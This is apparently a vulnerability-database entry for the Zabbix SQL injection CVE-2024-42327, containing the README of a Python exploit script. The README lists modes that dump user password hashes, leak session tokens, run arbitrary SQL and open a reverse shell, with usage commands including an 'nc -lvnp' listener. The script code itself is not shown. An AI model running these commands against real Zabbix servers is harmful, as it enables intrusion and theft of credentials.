关联漏洞
标题:
Zabbix SQL注入漏洞
(CVE-2024-42327)
描述:Zabbix是Zabbix公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix 6.0.0至6.0.31版本、6.4.0至6.4.16版本和7.0.0版本存在SQL注入漏洞,该漏洞源于CUser类的addRelatedObjects函数中存在SQL注入漏洞,允许攻击者操纵数据库查询。
描述
This is for educational porpuses only. Please do not use agains unathorized systems.
介绍
# 🛡️ Zabbix 7.0.0 SQL Injection Exploit Script
A Python script to exploit a **Zabbix 7.0.0** authenticated SQL injection vulnerability, supporting multiple modes of action including user data extraction, session token leaks, remote command execution (RCE), and custom query injection.
> ⚠️ **DISCLAIMER:**
> This script is for **educational** and **authorized penetration testing** purposes only.
> Do **not** use it on systems you do not own or have explicit permission to test.
> The author is not responsible for any misuse or damage caused by this tool.
---
## ✨ Features
- ✅ Authenticated SQL Injection against Zabbix 7.0.0
- 🧑💻 Dump user hashes from the DB
- 🔐 Leak session tokens
- 🐚 Remote code execution via reverse shell (admin token required)
- 🧠 Run custom SQL queries
---
## 🔧 Requirements
- Python 3.6+
- `requests` library
Install requirements if needed:
```bash
pip install requests
```
## 🚀 Usage
```bash
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]
```
## 🔘 Available Modes
| Mode | Description | Requires Admin Token |
| ------------ | ------------ | ------------ |
| leak-users | Dumps all user IDs, usernames, password hashes, and roles | ❌ |
| leak-tokens | Dumps all active session IDs from the database | ❌ |
| rce | Spawns a reverse shell via item.create exploit | ✅ |
| custom | Run any custom SQL query via the injection | ❌ |
## 🧪 Examples
Dump User Hashes
```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
```
Leak Session Tokens
```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
```
Remote Code Execution (Reverse Shell)
```bash
# Start a listener first:
nc -lvnp 9001
# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
```
Custom SQL Injection
```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
```
## 📁 Project Structure
```bash
sqliZabbix.py # Main exploit script
README.md # This documentation
```
## 🧑💻 Author
Anthony (@874anthony)
Crafted with love & curiosity 🐍
## 🔐 License
This project is released under the MIT License. Please use responsibly.
文件快照
[4.0K] /data/pocs/8d773782fe4c9b62ec1446a853ff598423627407
├── [2.3K] README.md
└── [8.6K] sqliZabbix.py
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。